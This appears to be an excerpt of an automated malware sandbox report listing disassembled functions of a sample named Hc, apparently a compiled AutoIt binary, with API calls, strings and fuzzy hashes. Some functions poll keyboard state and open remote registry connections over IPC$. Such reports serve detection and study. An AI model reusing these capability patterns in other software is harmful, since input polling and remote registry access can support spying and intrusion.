                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID: &l
                                                                  • API String ID: 776569668-1676360395
                                                                  • Opcode ID: d9ecf0df8fa576e08940e458497c2554c3c1b86e21a981eb96fae1d1d7986109
                                                                  • Instruction ID: 93dff93f5bad4e4d9d8b200210138759a592f3625e5b3630c3931467da053316
                                                                  • Opcode Fuzzy Hash: d9ecf0df8fa576e08940e458497c2554c3c1b86e21a981eb96fae1d1d7986109
                                                                  • Instruction Fuzzy Hash: CD11D476100109AFCB41EF94C852CDD3BB6FF16351F8146A8FE089B222DA31EA559B94
                                                                  Function 0068A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0068A9D9
                                                                  • SetKeyboardState.USER32(?), ref: 0068AA44
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0068AA64
                                                                  • GetKeyState.USER32(000000A0), ref: 0068AA7B
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0068AAAA
                                                                  • GetKeyState.USER32(000000A1), ref: 0068AABB
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0068AAE7
                                                                  • GetKeyState.USER32(00000011), ref: 0068AAF5
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0068AB1E
                                                                  • GetKeyState.USER32(00000012), ref: 0068AB2C
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0068AB55
                                                                  • GetKeyState.USER32(0000005B), ref: 0068AB63
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: be277167265d82d6942f59d0eae3d07c2b37bb47b4165d00fac0af76ff22a542
                                                                  • Instruction ID: cb8e45ab85b1a77b6c2a3c343d09ed4fabbc04dc2a5b00f0eaad5aa2ee969a7c
                                                                  • Opcode Fuzzy Hash: be277167265d82d6942f59d0eae3d07c2b37bb47b4165d00fac0af76ff22a542
                                                                  • Instruction Fuzzy Hash: E051A67090878429FF35FBE08950BEAABB75F11380F08479EC9C25A6C2DA549B4CC763
                                                                  Function 0068662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00686649
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00686662
                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 006866C0
                                                                  • GetDlgItem.USER32(?,00000002), ref: 006866D0
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006866E2
                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00686736
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00686744
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00686756
                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00686798
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 006867AB
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006867C1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 006867CE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: 7f12bf7d8512819d3364bc6526aed91a0d0e266296e40f436fd3287439df253a
                                                                  • Instruction ID: 7b57a2523250d4b075a0e210bc5970e6fb8746a318155ecaa9db00a4bc6b9ce6
                                                                  • Opcode Fuzzy Hash: 7f12bf7d8512819d3364bc6526aed91a0d0e266296e40f436fd3287439df253a
                                                                  • Instruction Fuzzy Hash: 465111B1B00205AFDF18DF68DD95AAEBBB6FB48315F108229F519E7290E7709D44CB50
                                                                  Function 00622128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • GetSysColor.USER32(0000000F), ref: 00622152
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 3e7ab949a81766b2c18e5cbc7585a0a677c0770648a6cb12a180f7a01a26ec1d
                                                                  • Instruction ID: 5a97117cbefe29865fdc1031377a9c5ddd3de40a35c1709644710677092caf0a
                                                                  • Opcode Fuzzy Hash: 3e7ab949a81766b2c18e5cbc7585a0a677c0770648a6cb12a180f7a01a26ec1d
                                                                  • Instruction Fuzzy Hash: 59419F71100A61BFDB245F28AC58FB9376BAB42324F145255EBA28B3E1D6318D92DF11
                                                                  Function 006213A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 006628D1
                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006628EA
                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006628FA
                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00662912
                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00662933
                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00662942
                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0066295F
                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006211F5,00000000,00000000,00000000,000000FF,00000000), ref: 0066296E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                  • String ID: (o
                                                                  • API String ID: 1268354404-1684096767
                                                                  • Opcode ID: eb2c8af7fbc77e184e4bd77386848be0c5317f30d6b3e5513d62c136deba574b
                                                                  • Instruction ID: 111e6da71de11acd5a12f866ceef5499aa433ecd90e5181e046540944d7003c8
                                                                  • Opcode Fuzzy Hash: eb2c8af7fbc77e184e4bd77386848be0c5317f30d6b3e5513d62c136deba574b
                                                                  • Instruction Fuzzy Hash: F0518970600A0AAFDB24DF25DC55BAA7BF7FB58310F104628F9569B2A0D770E991DF40
                                                                  Function 006B955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                    • Part of subcall function 006219CD: GetCursorPos.USER32(?), ref: 006219E1
                                                                    • Part of subcall function 006219CD: ScreenToClient.USER32(00000000,?), ref: 006219FE
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000001), ref: 00621A23
                                                                    • Part of subcall function 006219CD: GetAsyncKeyState.USER32(00000002), ref: 00621A3D
                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 006B95C7
                                                                  • ImageList_EndDrag.COMCTL32 ref: 006B95CD
                                                                  • ReleaseCapture.USER32 ref: 006B95D3
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 006B966E
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006B9681
                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 006B975B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID$(o$(o
                                                                  • API String ID: 1924731296-1905994682
                                                                  • Opcode ID: 6a4492b2a419c9518005f946b881c50e8b0ef297e7b5d8aa928bb0a56f66f64d
                                                                  • Instruction ID: 70c5677708dae663bb01a2e78a7957d571bdc2ca72d148c78f705b78ba6a08a6
                                                                  • Opcode Fuzzy Hash: 6a4492b2a419c9518005f946b881c50e8b0ef297e7b5d8aa928bb0a56f66f64d
                                                                  • Instruction Fuzzy Hash: AB518AB1104314AFD744EF24DC56BAA77E6FB88710F000A2CFA96972E2DB709944CF66
                                                                  Function 0068A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00670D31,00000001,0000138C,00000001,00000000,00000001,?,0069EEAE,006F2430), ref: 0068A091
                                                                  • LoadStringW.USER32(00000000,?,00670D31,00000001), ref: 0068A09A
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00670D31,00000001,0000138C,00000001,00000000,00000001,?,0069EEAE,006F2430,?), ref: 0068A0BC
                                                                  • LoadStringW.USER32(00000000,?,00670D31,00000001), ref: 0068A0BF
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0068A1E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 747408836-2268648507
                                                                  • Opcode ID: dcd674a04eb443d467bbb9b3fb104d97c04304f685a0a32cb0abe81fecaaf260
                                                                  • Instruction ID: 69606d80cf2b4333ffc9a0b9326e863e73fa03374734bc13c261b22887930193
                                                                  • Opcode Fuzzy Hash: dcd674a04eb443d467bbb9b3fb104d97c04304f685a0a32cb0abe81fecaaf260
                                                                  • Instruction Fuzzy Hash: 9D419372800629AADB45FBE0ED56DEEB77AEF14300F100169F501B6092EB316F49CFA5
                                                                  Function 00680FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00681093
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006810AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006810CB
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 006810F5
                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0068111D
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00681128
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0068112D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 323675364-22481851
                                                                  • Opcode ID: 576bfbdaf1351ad168ba34a765893aad16f2a8a69c65b5172e51a393452615bc
                                                                  • Instruction ID: 5cddd4ab3f6f0782f28efaeca0d5e4e2a70d5c7261d8628b778472291befff10
                                                                  • Opcode Fuzzy Hash: 576bfbdaf1351ad168ba34a765893aad16f2a8a69c65b5172e51a393452615bc
                                                                  • Instruction Fuzzy Hash: 47410672C10629ABCB11EFA4EC959EEB77AFF18740F004129F901AB261EB719E45CF54
                                                                  Function 006B4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 006B4AD9
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 006B4AE0
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 006B4AF3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006B4AFB
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 006B4B06
                                                                  • DeleteDC.GDI32(00000000), ref: 006B4B10
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B4B1A
                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 006B4B30
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 006B4B3C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: 6c1e6f1f44212a30a7494dc7a01bf15246eb197674ab7ebe813ad70c84efb6d6
                                                                  • Instruction ID: b35a59b5ea5ac864d244ac2108505428a94637513dee6e45bc4e02ab20c85f2c
                                                                  • Opcode Fuzzy Hash: 6c1e6f1f44212a30a7494dc7a01bf15246eb197674ab7ebe813ad70c84efb6d6
                                                                  • Instruction Fuzzy Hash: 373141B1140219BBDF219F64DC08FDA3B6AFF0D364F110325FA15A61A1DB75D890DB94
                                                                  Function 006A468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 006A46B9
                                                                  • CoInitialize.OLE32(00000000), ref: 006A46E7
                                                                  • CoUninitialize.OLE32 ref: 006A46F1
                                                                  • _wcslen.LIBCMT ref: 006A478A
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 006A480E
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 006A4932
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 006A496B
                                                                  • CoGetObject.OLE32(?,00000000,006C0B64,?), ref: 006A498A
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 006A499D
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006A4A21
                                                                  • VariantClear.OLEAUT32(?), ref: 006A4A35
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                  • String ID:
                                                                  • API String ID: 429561992-0
                                                                  • Opcode ID: f0552b6e994f8ad11d7db1328cce5bf04b0edc8e66b59c5c3b667b7a300e4738
                                                                  • Instruction ID: 8bf2a3906cc92f8f20fd8a4d9b8c719fd2b70d3804c930053a4c362279e66e51
                                                                  • Opcode Fuzzy Hash: f0552b6e994f8ad11d7db1328cce5bf04b0edc8e66b59c5c3b667b7a300e4738
                                                                  • Instruction Fuzzy Hash: DDC125B16043019FD700EF68C88496BB7EAFF8A748F10491DF9899B251DB71ED45CB52
                                                                  Function 006984DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 00698538
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006985D4
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 006985E8
                                                                  • CoCreateInstance.OLE32(006C0CD4,00000000,00000001,006E7E8C,?), ref: 00698634
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006986B9
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00698711
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0069879C
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006987BF
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 006987C6
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0069881B
                                                                  • CoUninitialize.OLE32 ref: 00698821
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2762341140-0
                                                                  • Opcode ID: 055d0cc945c9f93d15d1afe3a763bc0fa217ba1aaabbcb10739820b3083fc1f3
                                                                  • Instruction ID: 04b69bf5d00c9a2a5422d921b5243a55d03a4eb59abf39dccc46ee2439c45dca
                                                                  • Opcode Fuzzy Hash: 055d0cc945c9f93d15d1afe3a763bc0fa217ba1aaabbcb10739820b3083fc1f3
                                                                  • Instruction Fuzzy Hash: 86C12975A00119AFCB14DFA4C888DAEBBFAFF49304B148198F41A9B761DB30ED45CB90
                                                                  Function 00680378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0068039F
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 006803F8
                                                                  • VariantInit.OLEAUT32(?), ref: 0068040A
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0068042A
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0068047D
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00680491
                                                                  • VariantClear.OLEAUT32(?), ref: 006804A6
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 006804B3
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006804BC
                                                                  • VariantClear.OLEAUT32(?), ref: 006804CE
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006804D9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: e5fc5ba067dacc7f0224d3c8db5a3db439989a0a50d498aed6e790dfb97cd3b1
                                                                  • Instruction ID: dbf60fd052ea72aff2302fc5dda6a9c78797fe9fe2f9738e60f67259c8131530
                                                                  • Opcode Fuzzy Hash: e5fc5ba067dacc7f0224d3c8db5a3db439989a0a50d498aed6e790dfb97cd3b1
                                                                  • Instruction Fuzzy Hash: 05417275A00219EFDB50EFA4D8449EE7BFAFF08344F008569E915AB361DB30A945CF90
                                                                  Function 0068A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 0068A65D
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 0068A6DE
                                                                  • GetKeyState.USER32(000000A0), ref: 0068A6F9
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 0068A713
                                                                  • GetKeyState.USER32(000000A1), ref: 0068A728
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0068A740
                                                                  • GetKeyState.USER32(00000011), ref: 0068A752
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0068A76A
                                                                  • GetKeyState.USER32(00000012), ref: 0068A77C
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 0068A794
                                                                  • GetKeyState.USER32(0000005B), ref: 0068A7A6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 70c3b9a062ba7d330aa6bcf248027ca50e68cdb187a51c7b6eee55ceb6a7d0e3
